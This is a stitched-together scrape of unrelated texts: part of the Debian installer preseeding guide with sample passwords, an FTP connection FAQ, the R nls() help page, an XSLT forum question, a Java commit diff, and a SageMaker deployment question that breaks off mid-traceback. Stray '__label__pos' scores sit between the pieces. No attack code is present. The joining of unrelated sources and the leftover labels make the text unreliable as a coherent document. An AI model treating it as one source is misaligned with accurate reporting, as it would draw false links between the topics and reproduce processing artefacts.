instead: #d-i netcfg/choose_interface select eth1 # If you have a slow dhcp server and the installer times out waiting for # it, this might be useful. #d-i netcfg/dhcp_timeout string 60 # If you prefer to configure the network manually, uncomment this line and # the static network configuration below. #d-i netcfg/disable_dhcp boolean true # If you want the preconfiguration file to work on systems both with and # without a dhcp server, uncomment these lines and the static network # configuration below. #d-i netcfg/dhcp_failed note #d-i netcfg/dhcp_options select Configure network manually # Static network configuration. #d-i netcfg/get_nameservers string 192.168.1.1 #d-i netcfg/get_ipaddress string 192.168.1.42 #d-i netcfg/get_netmask string 255.255.255.0 #d-i netcfg/get_gateway string 192.168.1.1 #d-i netcfg/confirm_static boolean true # Any hostname and domain names assigned from dhcp take precedence over # values set here. However, setting the values still prevents the questions # from being shown, even if values come from dhcp. d-i netcfg/get_hostname string unassigned-hostname d-i netcfg/get_domain string unassigned-domain # Disable that annoying WEP key dialog. d-i netcfg/wireless_wep string # The wacky dhcp hostname that some ISPs use as a password of sorts. #d-i netcfg/dhcp_hostname string radish # If non-free firmware is needed for the network or other hardware, you can # configure the installer to always try to load it, without prompting. Or # change to false to disable asking. #d-i hw-detect/load_firmware boolean true Please note that netcfg will automatically determine the netmask if netcfg/get_netmask is not preseeded. In this case, the variable has to be marked as seen for automatic installations. Similarly, netcfg will choose an appropriate address if netcfg/get_gateway is not set. As a special case, you can set netcfg/get_gateway to “none” to specify that no gateway should be used. B.4.3. Network console # Use the following settings if you wish to make use of the network-console # component for remote installation over SSH. This only makes sense if you # intend to perform the remainder of the installation manually. #d-i anna/choose_modules string network-console #d-i network-console/password password r00tme #d-i network-console/password-again password r00tme B.4.4. Mirror settings Depending on the installation method you use, a mirror may be used to download additional components of the installer, to install the base system, and to set up the /etc/apt/sources.list for the installed system. The parameter mirror/suite determines the suite for the installed system. The parameter mirror/udeb/suite determines the suite for additional components for the installer. It is only useful to set this if components are actually downloaded over the network and should match the suite that was used to build the initrd for the installation method used for the installation. Normally the installer will automatically use the correct value and there should be no need to set this. # If you select ftp, the mirror/country string does not need to be set. #d-i mirror/protocol string ftp d-i mirror/country string manual d-i mirror/http/hostname string http.us.debian.org d-i mirror/http/directory string /debian d-i mirror/http/proxy string # Suite to install. #d-i mirror/suite string testing # Suite to use for loading installer components (optional). #d-i mirror/udeb/suite string testing B.4.5. Account setup The password for the root account and name and password for a first regular user's account can be preseeded. For the passwords you can use either clear text values or MD5 hashes. Warning Be aware that preseeding passwords is not completely secure as everyone with access to the preconfiguration file will have the knowledge of these passwords. Using MD5 hashes is considered slightly better in terms of security but it might also give a false sense of security as access to a MD5 hash allows for brute force attacks. # Skip creation of a root account (normal user account will be able to # use sudo). #d-i passwd/root-login boolean false # Alternatively, to skip creation of a normal user account. #d-i passwd/make-user boolean false # Root password, either in clear text #d-i passwd/root-password password r00tme #d-i passwd/root-password-again password r00tme # or encrypted using an MD5 hash. #d-i passwd/root-password-crypted password [MD5 hash] # To create a normal user account. #d-i passwd/user-fullname string Debian User #d-i passwd/username string debian # Normal user's password, either in clear text #d-i passwd/user-password password insecure #d-i passwd/user-password-again password insecure # or encrypted using an MD5 hash. #d-i passwd/user-password-crypted password [MD5 hash] # Create the first user with the specified UID instead of the default. #d-i passwd/user-uid string 1010 # The user account will be added to some standard initial groups. To # override that, use this. #d-i passwd/user-default-groups string audio cdrom video The passwd/root-password-crypted and passwd/user-password-crypted variables can also be preseeded with “!” as their value. In that case, the corresponding account is disabled. This may be convenient for the root account, provided of course that an alternative method is set up to allow administrative activities or root login (for instance by using SSH key authentication or sudo). The following command can be used to generate an MD5 hash for a password: $ printf "r00tme" | mkpasswd -s -m md5 B.4.6. Clock and time zone setup # Controls whether or not the hardware clock is set to UTC. d-i clock-setup/utc boolean true # You may set this to any valid setting for $TZ; see the contents of # /usr/share/zoneinfo/ for valid values. d-i time/zone string US/Eastern # Controls whether to use NTP to set the clock during the install d-i clock-setup/ntp boolean true # NTP server to use. The default is almost always fine here. #d-i clock-setup/ntp-server string ntp.example.com B.4.7. Partitioning Using preseeding to partition the harddisk is limited to what is supported by partman-auto. You can choose to partition either existing free space on a disk or a whole disk. The layout of the disk can be determined by using a predefined recipe, a custom recipe from a recipe file or a recipe included in the preconfiguration file. Preseeding of advanced partition setups using RAID, LVM and encryption is supported, but not with the full flexibility possible when partitioning during a non-preseeded install. The examples below only provide basic information on the use of recipes. For detailed information see the files partman-auto-recipe.txt and partman-auto-raid-recipe.txt included in the debian-installer package. Both files are also available from the debian-installer source repository. Note that the supported functionality may change between releases. Warning The identification of disks is dependent on the order in which their drivers are loaded. If there are multiple disks in the system, make very sure the correct one will be selected before using preseeding. B.4.7.1. Partitioning example # If the system has free space you can choose to only partition that space. # This is only honoured if partman-auto/method (below) is not set. #d-i partman-auto/init_automatically_partition select biggest_free # Alternatively, you may specify a disk to partition. If the system has only # one disk the installer will default to using that, but otherwise the device # name must be given in traditional, non-devfs format (so e.g. /dev/hda or # /dev/sda, and not e.g. /dev/discs/disc0/disc). # For example, to use the first SCSI/SATA hard disk: #d-i partman-auto/disk string /dev/sda # In addition, you'll need to specify the method to use. # The presently available methods are: # - regular: use the usual partition types for your architecture # - lvm: use LVM to partition the disk # - crypto: use LVM within an encrypted partition d-i partman-auto/method string lvm # If one of the disks that are going to be automatically partitioned # contains an old LVM configuration, the user will normally receive a # warning. This can be preseeded away... d-i partman-lvm/device_remove_lvm boolean true # The same applies to pre-existing software RAID array: d-i partman-md/device_remove_md boolean true # And the same goes for the confirmation to write the lvm partitions. d-i partman-lvm/confirm boolean true # You can choose one of the three predefined partitioning recipes: # - atomic: all files in one partition # - home: separate /home partition # - multi: separate /home, /usr, /var, and /tmp partitions d-i partman-auto/choose_recipe select atomic # Or provide a recipe of your own... # If you have a way to get a recipe file into the d-i environment, you can # just point at it. #d-i partman-auto/expert_recipe_file string /hd-media/recipe # If not, you can put an entire recipe into the preconfiguration file in one # (logical) line. This example creates a small /boot partition, suitable # swap, and uses the rest of the space for the root partition: #d-i partman-auto/expert_recipe string \ # boot-root :: \ # 40 50 100 ext3 \ # $primary{ } $bootable{ } \ # method{ format } format{ } \ # use_filesystem{ } filesystem{ ext3 } \ # mountpoint{ /boot } \ # . \ # 500 10000 1000000000 ext3 \ # method{ format } format{ } \ # use_filesystem{ } filesystem{ ext3 } \ # mountpoint{ / } \ # . \ # 64 512 300% linux-swap \ # method{ swap } format{ } \ # . # The full recipe format is documented in the file partman-auto-recipe.txt # included in the 'debian-installer' package or available from D-I source # repository. This also documents how to specify settings such as file # system labels, volume group names and which physical devices to include # in a volume group. # This makes partman automatically partition without confirmation, provided # that you told it what to do using one of the methods above. d-i partman-partitioning/confirm_write_new_label boolean true d-i partman/choose_partition select finish d-i partman/confirm boolean true d-i partman/confirm_nooverwrite boolean true B.4.7.2. Partitioning using RAID You can also use preseeding to set up partitions on software RAID arrays. Supported are RAID levels 0, 1, 5, 6 and 10, creating degraded arrays and specifying spare devices. Warning This type of automated partitioning is easy to get wrong. It is also functionality that receives relatively little testing from the developers of debian-installer. The responsibility to get the various recipes right (so they make sense and don't conflict) lies with the user. Check /var/log/syslog if you run into problems. # The method should be set to "raid". #d-i partman-auto/method string raid # Specify the disks to be partitioned. They will all get the same layout, # so this will only work if the disks are the same size. #d-i partman-auto/disk string /dev/sda /dev/sdb # Next you need to specify the physical partitions that will be used. #d-i partman-auto/expert_recipe string \ # multiraid :: \ # 1000 5000 4000 raid \ # $primary{ } method{ raid } \ # . \ # 64 512 300% raid \ # method{ raid } \ # . \ # 500 10000 1000000000 raid \ # method{ raid } \ # . # Last you need to specify how the previously defined partitions will be # used in the RAID setup. Remember to use the correct partition numbers # for logical partitions. RAID levels 0, 1, 5, 6 and 10 are supported; # devices are separated using "#". # Parameters are: # <raidtype> <devcount> <sparecount> <fstype> <mountpoint> \ # <devices> <sparedevices> #d-i partman-auto-raid/recipe string \ # 1 2 0 ext3 / \ # /dev/sda1#/dev/sdb1 \ # . \ # 1 2 0 swap - \ # /dev/sda5#/dev/sdb5 \ # . \ # 0 2 0 ext3 /home \ # /dev/sda6#/dev/sdb6 \ # . # For additional information see the file partman-auto-raid-recipe.txt # included in the 'debian-installer' package or available from D-I source # repository. # This makes partman automatically partition without confirmation. d-i partman-md/confirm boolean true d-i partman-partitioning/confirm_write_new_label boolean true d-i partman/choose_partition select finish d-i partman/confirm boolean true d-i partman/confirm_nooverwrite boolean true B.4.7.3. Controlling how partitions are mounted Normally, filesystems are mounted using a universally unique identifier (UUID) as a key; this allows them to be mounted properly even if their device name changes. UUIDs are long and difficult to read, so, if you prefer, the installer can mount filesystems based on the traditional device names, or based on a label you assign. If you ask the installer to mount by label, any filesystems without a label will be mounted using a UUID instead. Devices with stable names, such as LVM logical volumes, will continue to use their traditional names rather than UUIDs. Warning Traditional device names may change based on the order in which the kernel discovers devices at boot, which may cause the wrong filesystem to be mounted. Similarly, labels are likely to clash if you plug in a new disk or a USB drive, and if that happens your system's behaviour when started will be random. # The default is to mount by UUID, but you can also choose "traditional" to # use traditional device names, or "label" to try filesystem labels before # falling back to UUIDs. #d-i partman/mount_style select uuid B.4.8. Base system installation There is actually not very much that can be preseeded for this stage of the installation. The only questions asked concern the installation of the kernel. # Configure APT to not install recommended packages by default. Use of this # option can result in an incomplete system and should only be used by very # experienced users. #d-i base-installer/install-recommends boolean false # Select the initramfs generator used to generate the initrd for 2.6 kernels. #d-i base-installer/kernel/linux/initramfs-generators string initramfs-tools # The kernel image (meta) package to be installed; "none" can be used if no # kernel is to be installed. #d-i base-installer/kernel/image string linux-image-2.6-486 B.4.9. Apt setup Setup of the /etc/apt/sources.list and basic configuration options is fully automated based on your installation method and answers to earlier questions. You can optionally add other (local) repositories. # You can choose to install non-free and contrib software. #d-i apt-setup/non-free boolean true #d-i apt-setup/contrib boolean true # Uncomment this if you don't want to use a network mirror. #d-i apt-setup/use_mirror boolean false # Select which update services to use; define the mirrors to be used. # Values shown below are the normal defaults. #d-i apt-setup/services-select multiselect security, volatile #d-i apt-setup/security_host string security.debian.org #d-i apt-setup/volatile_host string volatile.debian.org # Additional repositories, local[0-9] available #d-i apt-setup/local0/repository string \ # http://local.server/debian stable main #d-i apt-setup/local0/comment string local server # Enable deb-src lines #d-i apt-setup/local0/source boolean true # URL to the public key of the local repository; you must provide a key or # apt will complain about the unauthenticated repository and so the # sources.list line will be left commented out #d-i apt-setup/local0/key string http://local.server/key # By default the installer requires that repositories be authenticated # using a known gpg key. This setting can be used to disable that # authentication. Warning: Insecure, not recommended. #d-i debian-installer/allow_unauthenticated boolean true B.4.10. Package selection You can choose to install any combination of tasks that are available. Available tasks as of this writing include: • standard • desktop • gnome-desktop • kde-desktop • web-server • print-server • dns-server • file-server • mail-server • sql-database • laptop You can also choose to install no tasks, and force the installation of a set of packages in some other way. We recommend always including the standard task. If you want to install some individual packages in addition to packages installed by tasks, you can use the parameter pkgsel/include. The value of this parameter can be a list of packages separated by either commas or spaces, which allows it to be used easily on the kernel command line as well. #tasksel tasksel/first multiselect standard, web-server # If the desktop task is selected, install the kde and xfce desktops # instead of the default gnome desktop. #tasksel tasksel/desktop multiselect kde, xfce # Individual additional packages to install #d-i pkgsel/include string openssh-server build-essential # Whether to upgrade packages after debootstrap. # Allowed values: none, safe-upgrade, full-upgrade #d-i pkgsel/upgrade select none # Some versions of the installer can report back on what software you have # installed, and what software you use. The default is not to report back, # but sending reports helps the project determine what software is most # popular and include it on CDs. #popularity-contest popularity-contest/participate boolean false B.4.11. Finishing up the installation # During installations from serial console, the regular virtual consoles # (VT1-VT6) are normally disabled in /etc/inittab. Uncomment the next # line to prevent this. #d-i finish-install/keep-consoles boolean true # Avoid that last message about the install being complete. d-i finish-install/reboot_in_progress note # This will prevent the installer from ejecting the CD during the reboot, # which is useful in some situations. #d-i cdrom-detect/eject boolean false # This is how to make the installer shutdown when finished, but not # reboot into the installed system. #d-i debian-installer/exit/halt boolean true # This will power off the machine instead of just halting it. #d-i debian-installer/exit/poweroff boolean true B.4.12. Preseeding other packages # Depending on what software you choose to install, or if things go wrong # during the installation process, it's possible that other questions may # be asked. You can preseed those too, of course. To get a list of every # possible question that could be asked during an install, do an # installation, and then run these commands: # debconf-get-selections --installer > file # debconf-get-selections >> file [24] Preseeding locale to en_NL would for example result in en_US.UTF-8 as default locale for the installed system. If e.g. en_GB.UTF-8 is preferred instead, the values will need to be preseeded individually.
__label__pos
0.614428
I get connection timed out connecting to your ftp server This is because your firewall or ftp client needs  to be adjusted to work correctly with our firewall.   If you are using Bullet Proof FTP, follow these steps: click on -> Options -> General Options- Firewall -> Click to uncheck Use Passive Mode If you are on Linux OS, you may also use sftp instead • 1 Users Found This Useful Was this answer helpful? Related Articles Where Can I Obtain an FTP Client? There are a few popular places to get a FTP program. Below are a few of the sites that Revion.com... How do I use FTP at the command line? How do I upload file in binary or asci mode? How do I use FTP at the command line? First, use the command: ftp your_hostname.com or...
__label__pos
0.884895
nls {stats}R Documentation Nonlinear Least Squares Description Determine the nonlinear (weighted) least-squares estimates of the parameters of a nonlinear model. Usage nls(formula, data, start, control, algorithm, trace, subset, weights, na.action, model, lower, upper, ...) Arguments formula a nonlinear model formula including variables and parameters. Will be coerced to a formula if necessary. data an optional data frame in which to evaluate the variables in formula and weights. Can also be a list or an environment, but not a matrix. start a named list or named numeric vector of starting estimates. When start is missing, a very cheap guess for start is tried (if algorithm != "plinear"). control an optional list of control settings. See nls.control for the names of the settable control values and their effect. algorithm character string specifying the algorithm to use. The default algorithm is a Gauss-Newton algorithm. Other possible values are "plinear" for the Golub-Pereyra algorithm for partially linear least-squares models and "port" for the ‘nl2sol’ algorithm from the Port library – see the references. Can be abbreviated. trace logical value indicating if a trace of the iteration progress should be printed. Default is FALSE. If TRUE the residual (weighted) sum-of-squares and the parameter values are printed at the conclusion of each iteration. When the "plinear" algorithm is used, the conditional estimates of the linear parameters are printed after the nonlinear parameters. When the "port" algorithm is used the objective function value printed is half the residual (weighted) sum-of-squares. subset an optional vector specifying a subset of observations to be used in the fitting process. weights an optional numeric vector of (fixed) weights. When present, the objective function is weighted least squares. na.action a function which indicates what should happen when the data contain NAs. The default is set by the na.action setting of options, and is na.fail if that is unset. The ‘factory-fresh’ default is na.omit. Value na.exclude can be useful. model logical. If true, the model frame is returned as part of the object. Default is FALSE. lower, upper vectors of lower and upper bounds, replicated to be as long as start. If unspecified, all parameters are assumed to be unconstrained. Bounds can only be used with the "port" algorithm. They are ignored, with a warning, if given for other algorithms. ... Additional optional arguments. None are used at present. Details An nls object is a type of fitted model object. It has methods for the generic functions anova, coef, confint, deviance, df.residual, fitted, formula, logLik, predict, print, profile, residuals, summary, vcov and weights. Variables in formula (and weights if not missing) are looked for first in data, then the environment of formula and finally along the search path. Functions in formula are searched for first in the environment of formula and then along the search path. Arguments subset and na.action are supported only when all the variables in the formula taken from data are of the same length: other cases give a warning. Note that the anova method does not check that the models are nested: this cannot easily be done automatically, so use with care. Value A list of m an nlsModel object incorporating the model. data the expression that was passed to nls as the data argument. The actual data values are present in the environment of the m component. call the matched call with several components, notably algorithm. na.action the "na.action" attribute (if any) of the model frame. dataClasses the "dataClasses" attribute (if any) of the "terms" attribute of the model frame. model if model = TRUE, the model frame. weights if weights is supplied, the weights. convInfo a list with convergence information. control the control list used, see the control argument. convergence, message for an algorithm = "port" fit only, a convergence code (0 for convergence) and message. To use these is deprecated, as they are available from convInfo now. Warning Do not use nls on artificial "zero-residual" data. The nls function uses a relative-offset convergence criterion that compares the numerical imprecision at the current parameter estimates to the residual sum-of-squares. This performs well on data of the form y = f(x, θ) + eps (with var(eps) > 0). It fails to indicate convergence on data of the form y = f(x, θ) because the criterion amounts to comparing two components of the round-off error. If you wish to test nls on artificial data please add a noise component, as shown in the example below. The algorithm = "port" code appears unfinished, and does not even check that the starting value is within the bounds. Use with caution, especially where bounds are supplied. Note Setting warnOnly = TRUE in the control argument (see nls.control) returns a non-converged object (since R version 2.5.0) which might be useful for further convergence analysis, but not for inference. Author(s) Douglas M. Bates and Saikat DebRoy: David M. Gay for the Fortran code used by algorithm = "port". References Bates, D. M. and Watts, D. G. (1988) Nonlinear Regression Analysis and Its Applications, Wiley Bates, D. M. and Chambers, J. M. (1992) Nonlinear models. Chapter 10 of Statistical Models in S eds J. M. Chambers and T. J. Hastie, Wadsworth & Brooks/Cole. http://www.netlib.org/port/ for the Port library documentation. See Also summary.nls, predict.nls, profile.nls. Self starting models (with ‘automatic initial values’): selfStart. Examples require(graphics) DNase1 <- subset(DNase, Run == 1) ## using a selfStart model fm1DNase1 <- nls(density ~ SSlogis(log(conc), Asym, xmid, scal), DNase1) summary(fm1DNase1) ## the coefficients only: coef(fm1DNase1) ## including their SE, etc: coef(summary(fm1DNase1)) ## using conditional linearity fm2DNase1 <- nls(density ~ 1/(1 + exp((xmid - log(conc))/scal)), data = DNase1, start = list(xmid = 0, scal = 1), algorithm = "plinear") summary(fm2DNase1) ## without conditional linearity fm3DNase1 <- nls(density ~ Asym/(1 + exp((xmid - log(conc))/scal)), data = DNase1, start = list(Asym = 3, xmid = 0, scal = 1)) summary(fm3DNase1) ## using Port's nl2sol algorithm fm4DNase1 <- nls(density ~ Asym/(1 + exp((xmid - log(conc))/scal)), data = DNase1, start = list(Asym = 3, xmid = 0, scal = 1), algorithm = "port") summary(fm4DNase1) ## weighted nonlinear regression Treated <- Puromycin[Puromycin$state == "treated", ] weighted.MM <- function(resp, conc, Vm, K) { ## Purpose: exactly as white book p. 451 -- RHS for nls() ## Weighted version of Michaelis-Menten model ## ---------------------------------------------------------- ## Arguments: 'y', 'x' and the two parameters (see book) ## ---------------------------------------------------------- ## Author: Martin Maechler, Date: 23 Mar 2001 pred <- (Vm * conc)/(K + conc) (resp - pred) / sqrt(pred) } Pur.wt <- nls( ~ weighted.MM(rate, conc, Vm, K), data = Treated, start = list(Vm = 200, K = 0.1)) summary(Pur.wt) ## Passing arguments using a list that can not be coerced to a data.frame lisTreat <- with(Treated, list(conc1 = conc[1], conc.1 = conc[-1], rate = rate)) weighted.MM1 <- function(resp, conc1, conc.1, Vm, K) { conc <- c(conc1, conc.1) pred <- (Vm * conc)/(K + conc) (resp - pred) / sqrt(pred) } Pur.wt1 <- nls( ~ weighted.MM1(rate, conc1, conc.1, Vm, K), data = lisTreat, start = list(Vm = 200, K = 0.1)) stopifnot(all.equal(coef(Pur.wt), coef(Pur.wt1))) ## Chambers and Hastie (1992) Statistical Models in S (p. 537): ## If the value of the right side [of formula] has an attribute called ## 'gradient' this should be a matrix with the number of rows equal ## to the length of the response and one column for each parameter. weighted.MM.grad <- function(resp, conc1, conc.1, Vm, K) { conc <- c(conc1, conc.1) K.conc <- K+conc dy.dV <- conc/K.conc dy.dK <- -Vm*dy.dV/K.conc pred <- Vm*dy.dV pred.5 <- sqrt(pred) dev <- (resp - pred) / pred.5 Ddev <- -0.5*(resp+pred)/(pred.5*pred) attr(dev, "gradient") <- Ddev * cbind(Vm = dy.dV, K = dy.dK) dev } Pur.wt.grad <- nls( ~ weighted.MM.grad(rate, conc1, conc.1, Vm, K), data = lisTreat, start = list(Vm = 200, K = 0.1)) rbind(coef(Pur.wt), coef(Pur.wt1), coef(Pur.wt.grad)) ## In this example, there seems no advantage to providing the gradient. ## In other cases, there might be. ## The two examples below show that you can fit a model to ## artificial data with noise but not to artificial data ## without noise. x <- 1:10 y <- 2*x + 3 # perfect fit yeps <- y + rnorm(length(y), sd = 0.01) # added noise nls(yeps ~ a + b*x, start = list(a = 0.12345, b = 0.54321)) ## terminates in an error, because convergence cannot be confirmed: try(nls(y ~ a + b*x, start = list(a = 0.12345, b = 0.54321))) ## the nls() internal cheap guess for starting values can be sufficient: x <- -(1:100)/10 y <- 100 + 10 * exp(x / 2) + rnorm(x)/10 nlmod <- nls(y ~ Const + A * exp(B * x)) plot(x,y, main = "nls(*), data, true function and fit, n=100") curve(100 + 10 * exp(x / 2), col = 4, add = TRUE) lines(x, predict(nlmod), col = 2) ## The muscle dataset in MASS is from an experiment on muscle ## contraction on 21 animals. The observed variables are Strip ## (identifier of muscle), Conc (Cacl concentration) and Length ## (resulting length of muscle section). utils::data(muscle, package = "MASS") ## The non linear model considered is ## Length = alpha + beta*exp(-Conc/theta) + error ## where theta is constant but alpha and beta may vary with Strip. with(muscle, table(Strip)) # 2, 3 or 4 obs per strip ## We first use the plinear algorithm to fit an overall model, ## ignoring that alpha and beta might vary with Strip. musc.1 <- nls(Length ~ cbind(1, exp(-Conc/th)), muscle, start = list(th = 1), algorithm = "plinear") summary(musc.1) ## Then we use nls' indexing feature for parameters in non-linear ## models to use the conventional algorithm to fit a model in which ## alpha and beta vary with Strip. The starting values are provided ## by the previously fitted model. ## Note that with indexed parameters, the starting values must be ## given in a list (with names): b <- coef(musc.1) musc.2 <- nls(Length ~ a[Strip] + b[Strip]*exp(-Conc/th), muscle, start = list(a = rep(b[2], 21), b = rep(b[3], 21), th = b[1])) summary(musc.2) [Package stats version 2.15.3 Index]
__label__pos
0.901598
Search I ran into an annoying thing last night where I couldn't do what I was trying to do. Wondering if anybody knew of a better way? Basically I needed to make a with-param "smarter", so it had a choose statement. But I wasn't passing a string with my with-param, I was passing the node itself. This works: <xsl:call-template name="sum-hours"> <xsl:with-param name="item" select="$item/following-sibling::entry[1]"/> </xsl:call-template> But this doesn't: <xsl:call-template name="sum-hours"> <xsl:choose> <xsl:when test="$type = 'section'"> <xsl:value-of select="$item/following-sibling::entry[estimate-section-link/item/@id = $selectorid][1]"/> </xsl:when> <xsl:when test="$type = 'task'"> <xsl:value-of select="$item/following-sibling::entry[estimate-task-link/item/@id = $selectorid][1]"/> </xsl:when> </xsl:choose> </xsl:call-template> Obviously value-of is to blame here, because it's creating a string, but I can't think of another way to do it? Please help!! Your second block does not have a xsl:with-param in it. How is it passing the parameter? Instead of putting choose inside call-templates, how about putting separate call-template calls inside the when blocks? Create an account or sign in to comment. Symphony • Open Source XSLT CMS Server Requirements • PHP 5.3-5.6 or 7.0-7.3 • PHP's LibXML module, with the XSLT extension enabled (--with-xsl) • MySQL 5.5 or above • An Apache or Litespeed webserver • Apache's mod_rewrite module or equivalent Compatible Hosts Sign in Login details
__label__pos
0.992958
Commit 1f41d7c7 authored by Falucho's avatar Falucho Retoques de Datos parent 96c726a0 ......@@ -26,7 +26,7 @@ public final class AEControlador { private boolean forceStop = false; private int generacion = 0; private int generacionInvariante = 0; private Long startTime = null; private Long startTime = 0L; private Long endTime = null; //Singleton ...... ......@@ -20,6 +20,7 @@ public final class ProblemaControlador { private HashMap<Integer, Arista> aristasPair; private HashMap<Integer, Parada> paradasOriginales; private List<Parada> coordEspeciales; private Matrix<Double> matrizOD; private Matrix<Integer> matrizDelaysPuntoAPunto; ......@@ -36,6 +37,17 @@ public final class ProblemaControlador { System.out.println("OK"); } public List<Parada> getCoordEspeciales() { if (coordEspeciales == null) { coordEspeciales = new ArrayList<>(); coordEspeciales.add(new Parada("10000\t3502646\t5611050")); coordEspeciales.add(new Parada("10003\t3453314\t5616550")); coordEspeciales.add(new Parada("10001\t3445756\t5613413")); coordEspeciales.add(new Parada("10002\t3451896\t5601352")); } return coordEspeciales; } public static ProblemaControlador getInstance() { if (INSTANCIA == null) { INSTANCIA = new ProblemaControlador(); ...... ......@@ -2,10 +2,7 @@ package uy.edu.fing.lrt.genetic; import uy.edu.fing.lrt.controlador.ProblemaControlador; import uy.edu.fing.lrt.controlador.PropiedadesControlador; import uy.edu.fing.lrt.modelo.Arista; import uy.edu.fing.lrt.modelo.Concentrador; import uy.edu.fing.lrt.modelo.Individuo; import uy.edu.fing.lrt.modelo.Linea; import uy.edu.fing.lrt.modelo.*; import uy.edu.fing.lrt.util.GlpkUtil; import uy.edu.fing.lrt.util.ListUtil; import uy.edu.fing.lrt.util.PropiedadesEnum; ......@@ -35,6 +32,8 @@ public final class Inicializador { default: throw new RuntimeException("No se ha definido una acion " + algoritmo + " para la propiedad " + PropiedadesEnum.INICIALIZACION.getNombre()); } result.add(Generador.sol1()); result.add(Generador.sol2()); result.parallelStream().forEach(e -> ProblemaControlador.getInstance().calculoDeFrecuencias(e)); return result; } ...... ......@@ -97,7 +97,7 @@ public final class GuiHelper { lblEstado.setText(""); Individuo best = AEControlador.getInstance().getBest(); if (best != null) { individuo = best.getAristas(); String tiempo = AEControlador.getInstance().getTime(); int gen = AEControlador.getInstance().getGeneracion(); String frecs = best.getLineas().stream().map(l -> l.getFrecuencia() + "").collect(Collectors.joining("-")); ......@@ -205,6 +205,18 @@ public final class GuiHelper { g.fillOval(x - 1, y - 1, 1, 1); }); // java.util.List<Parada> coordEspeciales = ProblemaControlador.getInstance().getCoordEspeciales(); // g.setColor(Color.green); // coordEspeciales.forEach((parada) -> { // // final int x = ((int) (parada.getCoordX().intValue() * propX)) + 10; // final int y = (int) mapa.getSize().getHeight() - (((int) (parada.getCoordY().intValue() * propY))) - 10; // // g.drawOval(x - 3, y - 3, 7, 7); // g.fillOval(x - 3, y - 3, 7, 7); // // }); return g; } ...... ......@@ -561,6 +561,10 @@ public final class Principal extends javax.swing.JFrame { Path path = Paths.get(pathPlace + "\\" + "individuo.txt"); try (BufferedWriter writer = Files.newBufferedWriter(path)) { // for (Linea l : GuiHelper.sol1().getLineas()) { // String line = l.getNodos().stream().map(e -> e + "").collect(Collectors.joining("\t", "", "\n")); // writer.write(line); // } for (Arista arista : individuo) { writer.write(arista.getIdNodoA() + "\t"); writer.write(arista.getIdNodoB() + "\t"); ...... package uy.edu.fing.lrt.modelo; import uy.edu.fing.lrt.controlador.ProblemaControlador; import uy.edu.fing.lrt.util.GlpkUtil; import java.util.Arrays; import java.util.List; import java.util.stream.Collectors; public final class Generador { //Metodos estaticos private Generador() { } private void metodo() { Individuo individuo = Generador.sol1(); Integer delay1 = (new Linea(GlpkUtil.SPP(individuo.getAristas(), 5, 4, Arista::getDelay))).getDelay() / 60; Integer delay2 = (new Linea(GlpkUtil.SPP(individuo.getAristas(), 5, 3, Arista::getDelay))).getDelay() / 60; Integer delay3 = (new Linea(GlpkUtil.SPP(individuo.getAristas(), 7, 3, Arista::getDelay))).getDelay() / 60; Integer delay4 = (new Linea(GlpkUtil.SPP(individuo.getAristas(), 7, 6, Arista::getDelay))).getDelay() / 60; Integer delay5 = (new Linea(GlpkUtil.SPP(individuo.getAristas(), 6, 2, Arista::getDelay))).getDelay() / 60; System.out.println(); } private static Arista find(int a, int b) { return ProblemaControlador.getInstance().getArista(a, b); } private static Arista find(int a) { return ProblemaControlador.getInstance().getArista(a); } private static Linea build(int[] idAristas) { List<Arista> aristas = Arrays.stream(idAristas).mapToObj(Generador::find).collect(Collectors.toList()); return new Linea(aristas); } private static Concentrador build(int[]... idAristas) { int size = idAristas.length; List<Linea> lineas = Arrays.stream(idAristas).map(Generador::build).collect(Collectors.toList()); return new Concentrador(size, lineas); } private static Individuo buildI(int[] sizes, int[]... idAristas) { int start = 0; int end; Concentrador[] c = new Concentrador[sizes.length]; for (int i = 0, sizesLength = sizes.length; i < sizesLength; i++) { int size = sizes[i]; end = start + size; c[i] = build(Arrays.copyOfRange(idAristas, start, end)); start = end; } return new Individuo(c); } public static Individuo sol1() { return buildI(new int[]{2, 2, 3, 2}, new int[]{18, 32, 64, 6}, new int[]{16, 29, 65, 21, 22, 68, 70, 72, 83, 10},//ojo aca, no es 10, 12 new int[]{20, 46, 48, 50, 52, 79, 11}, new int[]{19, 45, 49, 51, 7}, new int[]{21, 65, 62, 64, 6}, new int[]{22, 68, 70, 72, 83, 10}, new int[]{23, 89, 86, 87, 13}, new int[]{27, 44, 45, 49, 52, 79, 11}, new int[]{26, 42, 50, 51, 7} ); } public static Individuo sol2() { return buildI(new int[]{2, 2, 3, 2}, new int[]{18, 32, 64, 6}, new int[]{16, 29, 65, 21, 22, 68, 70, 72, 83, 12},//ojo aca, no es 10, 12 new int[]{20, 46, 48, 50, 52, 79, 11}, new int[]{19, 45, 49, 51, 7}, new int[]{21, 65, 62, 64, 6}, new int[]{22, 68, 70, 72, 83, 12}, new int[]{23, 89, 86, 87, 13}, new int[]{27, 44, 45, 49, 52, 79, 11}, new int[]{26, 42, 50, 51, 7} ); } } ......@@ -35,6 +35,12 @@ public final class Parada { return nombre; } public static String calcOriginalCoords(double coordX, double coordY) { double x = (coordX + 36775.622427676) / 0.0648407565611663; double y = (coordY + 397188.171216462) / 0.0647443036353733; return x + "\t" + y; } @Override public String toString() { return nombre + "(" + coordX + ", " + coordY + ")"; ...... Markdown is supported 0% or You are about to add 0 people to the discussion. Proceed with caution. Finish editing this message first! Please register or to comment
__label__pos
0.918778
Unable to deploy to SageMaker via Studio notebook Kernel specifications: Image: Data Science 3.0 Kernel: Python 3 Instance type: ml.t3.medium Start-up script: No script This is my exact notebook code, copied from the “Deploy” button on https://huggingface.co/HuggingFaceM4/idefics-80b: import sagemaker from sagemaker.huggingface import HuggingFaceModel role = sagemaker.get_execution_role() # Hub Model configuration. https://huggingface.co/models hub = { 'HF_MODEL_ID':'HuggingFaceM4/idefics-80b', 'HF_TASK':'text-generation' } # create Hugging Face Model Class huggingface_model = HuggingFaceModel( transformers_version='4.26.0', pytorch_version='1.13.1', py_version='py39', env=hub, role=role, ) # deploy model to SageMaker Inference predictor = huggingface_model.deploy( initial_instance_count=1, # number of instances instance_type='ml.m5.xlarge' # ec2 instance type ) data = { "inputs": "Can you please let us know more details about your " } predictor.predict(data) I am able to deploy the model and I can see the endpoint. However, running the predict method always throws this error: ModelError Traceback (most recent call last) Cell In[17], line 1 ----> 1 predictor.predict(data) File /opt/conda/lib/python3.10/site-packages/sagemaker/base_predictor.py:185, in Predictor.predict(self, data, initial_args, target_model, target_variant, inference_id, custom_attributes) 138 """Return the inference from the specified endpoint. 139 140 Args: 